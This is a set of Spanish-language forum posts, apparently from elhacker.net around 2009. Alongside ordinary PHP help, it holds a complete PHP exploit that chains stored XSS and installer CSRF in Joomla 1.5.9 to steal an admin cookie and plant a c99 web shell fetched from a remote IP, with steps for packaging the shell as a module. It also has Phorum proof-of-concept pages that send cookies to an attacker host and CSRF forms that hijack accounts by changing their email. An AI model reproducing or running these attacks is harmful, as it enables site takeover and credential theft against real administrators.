Mensajes

Hola, gracias,

1º ¿Se puede dar el caso de que se incluya más de una vez modulo.php? Si no es así utiliza include().

La idea es que no ocurra pero lo hacía por precaución ya que no pensaba que include_once() utilizaba mas recursos que include() ya que en caso contrario solo usaría _once.

2º Las etiquetas <html></html> irian en index.php.

Claro, eso está declarado en la plantilla solo era un ejemplo.

Gracias otraves.

Hola, estaba haciendo un sistema modular donde se incluye el archivo php y quiero que todo lo que lanze ese archivo como un echo o un print_r que se guarde en una variable para despues poder lanzarlo en otra parte.
Ejemplo..

index.php

Código (php) [Seleccionar] Expandir

<?php
// accion para que tome todo lo que viene en una variable $cuerpo
include_once('modulo.php');

echo 'cabezera';
echo $cuerpo;
echo 'termino';

?>

modulo.php

Código (php) [Seleccionar] Expandir

<html>
<?php echo 'portada'; ?>
</html>

Esto también me serviría para poder manipular el contenido en caso de ser necesario.

La pregunta del millón.. alguien recuerda como hacerlo??, se que algo tiene que ver ob_start y funciones relacionadas pero no las conozco bien y en php.net me enreda un poco 

[Impact: High]

Me ha llegado un correo desde Joomlacode.org y al parecer si les ha dolido un poco el video porque acaban de reabrir el tema que les habia enviado en el tracker donde exponía todo esto, al parecer en ese entonces no le dieron para nada importancia ya que hasta lo habian cerrado pero ahora después del video lo acaban de reabrir sin acceso a la totalidad del público y lo clasificaron como alto impacto XD

Joomla 1.5.X item #15065, was opened at 2009-02-15 12:02:16

Priority: 3
Submitted By: zkizzik zkizzik (zkizzik)
> >Assigned to: Anthony Ferrara (ircmaxell)
Summary: Múltiples fallas - CSRF, XSS, Path disclosure
> >Joomla Version: 1.5.9
> >Impact: High
Status: Open
> >Source: http://foro.elhacker.net/nivel_web/multiples_fallas_en_joomla_159-t244742.0.html

> >Severity: Moderate
> >Duration (Days):
Estimated Effort (Hours):
Percent Complete (0-100):


Initial Comment:
http://forum.joomla.org/viewtopic.php?f=300&t=371705
http://foro.elhacker.net/nivel_web/multiples_fallas_en_joomla_159-t244742.0.html

En estos dos enlaces expuse las múltiples fallas que pude encontrar y no se cuantos mas pueda ver pero al parecer hay bastantes mas que siguen con el mismo criterio.
Escribir una por una en este lugar creo que sería mucho por eso puse los enlaces.

• CSRF en el componente "Media"
  
• XSS Reflejado en el componente "Administrator" sobre task=sysinfo
  
• CSRF en el Componente "Installer"
  
• XSS Permanente en el componetne "Search"
  
• File Disclosure en el componente "Installer"
  
  http://img443.imageshack.us/img443/9854/dibujo2zq7.png
  http://img144.imageshack.us/img144/1456/dibujokw5.png
  
  etc..
  
  ----------------------------------------------------------------------
  
  You can respond by visiting:
  http://joomlacode.org/gf/project/jsecurity/tracker/?action=TrackerItemEdit&tracker_id=7925&tracker_item_id=15065
  Or by replying to this e-mail entering your response between the following markers:
  
  #+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+
  (enter your response here)
  #+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+#+
  
  ----------------------------------------------------------------------
  
  Follow-Ups:
  
  -------------------------------------------------------
  Date: 2009-03-25 12:25:18
  By: Anthony Ferrara
  
  Comment:
  Patch Attached
  

El tracker está acá
http://joomlacode.org/gf/project/jsecurity/tracker/?action=TrackerItemEdit&tracker_id=7925&tracker_item_id=15065
tal como lo dice el correo pero al ingresar me deniega el acceso 

Página de Inicio » Permission Denied
Permission Denied

Por lo menos ahora si van a  pensar en repararlo.

Access denied for user 'exkanka'@'localhost'

Ese error es porque la conexión hacia la base de datos no ha sido realizada, revisa tu servidor o tus datos de conexión.

[mod_artimesk.xml]

Lo prometido es deuda..
Hize un video y un exploit pero que hace?, solamente haces que un usuario con derechos de administración visualiza este script para que se le suba automaticamente una shell c99 eso es todo y al finalizar el script te deja un log diciendote si falló o donde quedó finalemnte la shell.
Lo único que deben modificar es la ruta del paquete de joomla que contiene la shell (ya les mostraré como fabricarlo) y la ruta del sistema vulnerable.

Código (php) [Seleccionar] Expandir

<?php
error_reporting(0);

$EXPL['SITIO_VULNERABLE'] = 'http://127.0.0.1/joomla/'; // Web vulnerable
$EXPL['URL_COM_SHELL'] = 'http://201.223.24.232:81/mod_arkimest.zip'; // La shell

$EXPL['XSS'] = '<script '.
'src="http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?act=js" ></script>';

if($_GET['act'] == 'js'){
 die('
 // Acá tu laaaargo script
 
 var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
 function base64_encode(input){
  var output = "";
  var chr1, chr2, chr3;
  var enc1, enc2, enc3, enc4;
  var i = 0;
  do{
   chr1 = input.charCodeAt(i++);
   chr2 = input.charCodeAt(i++);
   chr3 = input.charCodeAt(i++);
   enc1 = chr1 >> 2;
   enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
   enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
   enc4 = chr3 & 63;
   if(isNaN(chr2)){
    enc3 = enc4 = 64;
   }else if(isNaN(chr3)){
    enc4 = 64;
   }
   output = output + keyStr.charAt(enc1) + keyStr.charAt(enc2) + keyStr.charAt(enc3) + keyStr.charAt(enc4);
  }while(i < input.length);
  return output;
 }
 
 window.location.href="http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'?act=galletas&sabor=" + base64_encode(document.cookie);
');

}elseif($_GET['act'] == 'galletas'){
 if(!$cookies = base64_decode($_GET['sabor'])) die('<strong>No hay galletas ni chocolates :(</strong>');
 $buffer = http_get($EXPL['SITIO_VULNERABLE'].'/administrator/index.php?option=com_installer', $cookies);
 $buscar = explode('hidden" name="', $buffer);
 foreach($buscar as $encontrado){
  $encontrado = explode('"', $encontrado);
  $encontrado = $encontrado[0];
  if(strlen($encontrado) == 32){
   $hash = $encontrado;
   break;
  }
 }
 $buffer = http_post(
  $EXPL['SITIO_VULNERABLE'].'/administrator/index.php', $cookies, 
  $hash.'=1&install_url='.urlencode($EXPL['URL_COM_SHELL']).'&installtype=url&task=doInstall&option=com_installer&'
 );
 if(eregi('200 OK', http_get($EXPL['SITIO_VULNERABLE'].'/modules/mod_artimesk/mod_artimesk.php'))){
  // Explotación ejecutada con éxito! la shell está en /modules/mod_artimesk/mod_artimesk.php
  header('Explotado-por: WHK');
  $explotado = true;
 }else{
  // La explotación ha fallado.
  $explotado = false;
 }
 if($archivo_handle = fopen('log_('.date('Y.m.d.H.i.s').')_.txt', 'x')){
  if($explotado){
   fwrite($archivo_handle, 'La shell ha sido obtenida exitosamente!. URL: '.$EXPL['SITIO_VULNERABLE'].'/modules/mod_artimesk/mod_artimesk.php'."\x0D\x0A");
   header('location: https://foro.elhacker.net/nivel_web/multiples_fallas_csrf_xss_directoindirecto_en_joomla_159-t244742.0.html');
  }else{
   fwrite($archivo_handle, 'El sitio '.$EXPL['SITIO_VULNERABLE'].' no pudo ser explotado debido a que la versión de joomla no es compatible o el administrador no tenía acceso a su rpopio sitio web.'."\x0D\x0A");
   header('location: http://noscript.net/');
  }
  fclose($archivo_handle);
 }
 exit($explotado);
}

// Ejecuta el código javascript arbitrario
$pedir = $EXPL['SITIO_VULNERABLE'].'/index.php?searchword='.urlencode(urlencode($EXPL['XSS'])).'&ordering=&searchphrase=all&option=com_search';
if(http_get($pedir, 'null[]=token')){
 header('location: '.$EXPL['SITIO_VULNERABLE'].'administrator/index.php?option=com_search');
}else{
 die('hola :-s');
}

function http_post($url, $cookies, $postdata){
 $timeout = 100;
 $ch = curl_init($url);
 curl_setopt($ch, CURLOPT_POST, true);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
 curl_setopt($ch, CURLOPT_TIMEOUT, (int)$timeout);
 curl_setopt($ch, CURLOPT_HEADER, true);
 curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
 curl_setopt($ch, CURLOPT_COOKIE, $cookies);
 $contenido = curl_exec($ch);
 $error = curl_error($ch);
 curl_close($ch);
 if($contenido)
  return $contenido;
 else
   return $error;
}

function http_get($url, $cookies){
 $timeout = 100;
 $ch = curl_init($url);
 curl_setopt($ch, CURLOPT_POST, false);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
 curl_setopt($ch, CURLOPT_TIMEOUT, (int)$timeout);
 curl_setopt($ch, CURLOPT_HEADER, true);
 curl_setopt($ch, CURLOPT_COOKIE, $cookies); 
 $contenido = curl_exec($ch);
 $error = curl_error($ch);
 curl_close($ch);
 if($contenido)
  return $contenido;
 else
   return $error;
}

?>

Como crear el Componente con la shell dentro?

mod_artimesk.xml

Código (xml) [Seleccionar] Expandir

<?xml version="1.0" encoding="utf-8"?>
<install type="module" version="1.0.0">
<name>WHK Arkimest</name>
<author>WHK</author>
<creationDate>March 2009</creationDate>
<copyright>Copyright (C) WHK 2009. All rights reserved.</copyright>
<license>http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL</license>
<authorEmail>www.kernel32@gmail.com</authorEmail>
<authorUrl>foro.elhacker.net</authorUrl>
<version>1.0.0</version>
<description>Artimesk</description>
<files>
<filename module="mod_artimesk">mod_artimesk.php</filename>
</files>
</install>

Donde dice "mod_artimesk.php" es el archivo que lleva la shell.

mod_artimesk.php

Código (php) [Seleccionar] Expandir

<?php /* acá mi shell */ ?>
Puedes poner lo que quieras o puedes usar directamente una shell c99 renombrada a mod_artimesk.php tal como esta: http://www.geocities.com/zkizzik/c99.txt

Toma esos dos archivos y guardalo en zip y ya tienes tu módulo shell para joomla ^^

VIDEO
[youtube=600,500]http://www.youtube.com/watch?v=C-J15H8FT5w&feature=player_embedded[/youtube]

Ver video en tamaño completo:
http://lab.jccharry.com/joomla/xss2shell159/

Bueno, no se si les ha pasado cuando crean un sistema o lo que sea y no les funciona.. comienzan a alterar el código como por ejemplo..

Código (php) [Seleccionar] Expandir

$texto = 'direccion@gmail.com';
echo '1';
if(eregi('@gmal',$texto)){
echo '2';
redireccionar();
echo '3';
}else{
echo '4';
guardar();
echo '5';
}

jajaja para saber hasta donde se produce la falla pero a veces poner numeros y cosas no resulta muy bién porque se te pierden  asi que yo de plano a veces pongo <h1>TEST</h1> pero me encontré que editando un módulo de joomla esto se me perdía  asi que dije "y donde está wally?" asi que me busqué en google a wally y lo pegué poniendo mas visible donde estaba la falla 





jajaja infalible!

Si lo probé, para modificar directamente el password necesitas ingresar el password antiguo y así no podrás, lo que hay que hacer es atraves de un CSRF modificar el correo y decirle al sistema que olvidaste la contraseña para que le puedas asignar la que tu quieras.
No vi si algunas variables que viajan atraves de POST pueden ser declaradas desde GET, lo desconozco pero si fuera así entonces el riesgo sería mayor tal como lo es en el sistema Cpanel que toma todos los valores tanto via get como post compatibilizando un ataque via GET sin la necesidad de utilizar javascript para un redireccionamiento como se hace via post (o me equivoco?  , por lo menos yo lo desconozco).

[1. XSS]

Sistema afectado: http://www.phorum.org/

Entré en el foro de un amigo (si se puede decir amigo todavía) y me dió curiosidad de saber que sistema estaba utilizando o realemnte lo habia construido el y su staff como me habian dicho así que me puse a revisar sus variables get y las puse en gogole una por una hasta que encontré que estaban utilizando un sistema de foros llamado Phorum, me dió mas curiosidad todavía y me puse a descargar el sistema.
Al darle un vistazo simple a un solo archivo me di cuenta de muchisimas faltas que podia causar desde un XSS hasta CSRF.

Como el foro era de un "amigo" se lo dije por msn y me mandó a la chingada XD y me dijo que porque no jodia en otro lado y reportaba la falla al autor y bueno, eso fue lo que hize. Ahora que el sistema ya ha sido parchado (en parte) lo publicaré en este lugar.

Les demostraré atraves de estas fallas como entrar como Administrador teniendo acceso total al servidor, postear como otros usuarios, modificar contraseñas de sesiones, etc.

1. XSS

Código (php) [Seleccionar] Expandir

} elseif(isset($_POST["panel"])){
    $panel = $_POST["panel"];
Acá podemos ver en el archivo control.php que declara la variable $panel directamente desde $_POST["panel"] sin procesar ningún tipo de filtro ni nada permitiendo la inserción de carácteres especiales como "<", ">", comillas etc los cuales pueden transformarse en código HTML.
Para que esto funcione vemos que la variable es POST así que hacemos una petición POST inyectando esa variable de la siguiente manera:

Código (html4strict) [Seleccionar] Expandir

<form method="post" action="http://web/path/control.php">
<input type="text" name="panel" value="Tu XSS acá" />
<input type="submit" value=" Submit "/>
</form>

Enviamos un valor algo así como: "><h1>prueba
y podemos ver que el código html infectó la variable $panel pero en que parte se muestra ahora para que se ejecute?:

Código (php) [Seleccionar] Expandir

$PHORUM['DATA']['POST_VARS'].="<input type=\"hidden\" name=\"panel\" value=\"{$panel}\" />\n";
Offtopic (En este caso utilizar comillas simples para declarar el valor de esa variable era mas eficiente ya que evitabas escribir \ cada ves que quisiera ingresar una comilla doble y las llaves se hubieran reemplazado por comilla mas coma que pasado a eficiencia resulta mas liviano en ejecutarse y mas aún cuando esto se extiende en todo el sistema)

Podemos ver que $panel es imrpimido en la web y cuando enviamos la variable post podemos ver como se incrusta nuestro código en la web.

2. CSRF
Bueno, acá n vamos a profundizar o tendremos que exponer todas las funciones que utilizen POST y GET para actualizar datos ya que en ningún caso es utilizado ningún token ni una verificación de referencia ni nada así que podriamos decir que podemos hacer practicamente de todo arbitrariamente tanto como modificar los datos de su perfil como postear, cambiar contraseñas etc etc.

Pruebas
Creamos un archivo llamativo que requiera javascript para ejecutar nuestro XSS:

Index.html

Código (html4strict) [Seleccionar] Expandir

<object width="425" height="344">
<param name="movie" value="http://www.youtube.com/v/GIiFGMYpLUc&hl=es&fs=1">
</param>
<param name="allowFullScreen" value="true">
</param>
<param name="allowscriptaccess" value="always">
</param>
<embed src="http://www.youtube.com/v/GIiFGMYpLUc&hl=es&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344">
</embed>
</object>
<!-- muchos espacios de retorno acá -->
<br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br>
<br><br>
<iframe src="test.html" width="1" height="1" frameborder="0"></iframe>

test.html

Código (html4strict) [Seleccionar] Expandir

<!--
-=[WHK]=-
Prueba de concepto para Phorum 5.2.10 y versiones anteriores.
Prueba de concepto 1 de 18
-->
<form method="post" action="http://foro.forodemiamigo.net/control.php">
<input type="hidden" value='">
<script>document.location="http://mi_ip/metopo.json?req=" + document.cookie;</script>
<br x="' name="panel"/>
<input type="submit" value=" Submit "/>
</form>
<script>document.getElementsByTagName("form")[0].submit();</script>

Con esto hacemos que nuestro amigo administrador o alguiehn que tenga los suficientes derechos pueda ver el video que aparece en el index.html y cuando lo haga nos enviará su cookie en forma de petición get como por ejemplo:
http://mi_ip/metopo.json?req=sdfhvfsdf4645465
Ahora para capturarlo pueden hacerlo en php y guardarlo en un texto, en mi caso simplemente lo capturé desde los logs de acceso.

Ahora tomamos esa cookie y la ponemos en nuestro explorador y listo!, ya somos Administradores  .

Ahora en el caso de que no hubiera XSS y quisieras hacerlo via CSRF puedes enviarle una petición para modificar su correo y luego debolverte tu pass al mismo ^^

Código (html4strict) [Seleccionar] Expandir

<form action="http://foro.forodemiamigo.net/control.php" method="post">
<input type="hidden" name="forum_id" value="0" />
<input type="hidden" name="panel" value="email" />
<input type="hidden" name="email" value="mi_mail@gmail.com" />
<input type="hidden" name="hide_email" value="1" />
<input type="submit" value=" Submit " />
</form>
<script>document.getElementsByTagName("form")[0].submit();</script>
Ahora que ya modificamos su mail nos pedirá un código de confirmación para comprobar que el correo le pertenece y eso debe ser ingresado en su mismo panel de usuario así que lo recogemos y enviamos desde otro csrf:

Código (html4strict) [Seleccionar] Expandir

<form method="post" action="http://foro.forodemiamogo.net/control.php">
<input type="hidden" value="0" name="forum_id"/>
<input type="hidden" value="email" name="panel"/>
<input type="hidden" value="mi_mail@gmail.com" name="email"/>
<input type="hidden" value="HASH RECIBIDO POR MAIL" name="email_verify_code"/>
<input type="hidden" checked="checked" value="1" name="hide_email"/>
<input type="submit" value=" Submit "/>
</form>
<script>document.getElementsByTagName("form")[0].submit();</script>

Otras cosas que puedes hacer de la misma forma es postear por tu amigo o modificar su firma, etc.

Ahora le pusieron un Token de seguridad para evitar un ataque CSRF pero si tubieras acceso a otro XSS podrías incluir instrucciones Ajax para tomar el valor de su token y enviar una petición via XMLHttp con el CSRF y realizar exatamente lo mismo nuevamente.

Recibí en el último correo del director del rpoyecto los links con los trakers para que puedan actualizar su sistema yq eu todavía no se pone el paquete con sus parches de forma publica:
http://trac.phorum.org/changeset/3930
http://trac.phorum.org/changeset/3936
http://trac.phorum.org/changeset/3787

También le comenté de la ausencia de mysql_close dejandolo vulnerable a un ataque de peticiones masivas de vajo nivel causando daños relevantes ya que se ahogaría solo con tantas conexiones.

Cuando lo guardas con codificación de texto UTF-8 al texto se le agregan no recuerdo si dos o tres bites antes de todo lo demás y aparecen unos simbolos extraños arriba al comienzo, talves sea eso.. solamente hay que abrirlo y darle en guardar como en el tipo de codificación normal iso-....

Pero no era un spam, estaba ensenando la web de mi empresa creada con el framework de codeigniter.... no le veo nada de spam.

Bueno si entras y creas un tema diciendo "miren mi web http://......." y nada mas entonces es comprensible que pueda seer considerado spam y aque no le hacemos publicidad a nadie ni permitimos que otros se cuelguen pero en tu caso como fue de buenas intensiones yo creo que podrías profundizar un poco mas, por ejemplo decir... "mi web está basado en bla bla bla y tiene un código super genial acá y acá y pienso modificarle esto y esto otro.. que opinan?", creo que con algo así podría cambiar ya que el centro del tema no sería tu web sino como está hecha tu web.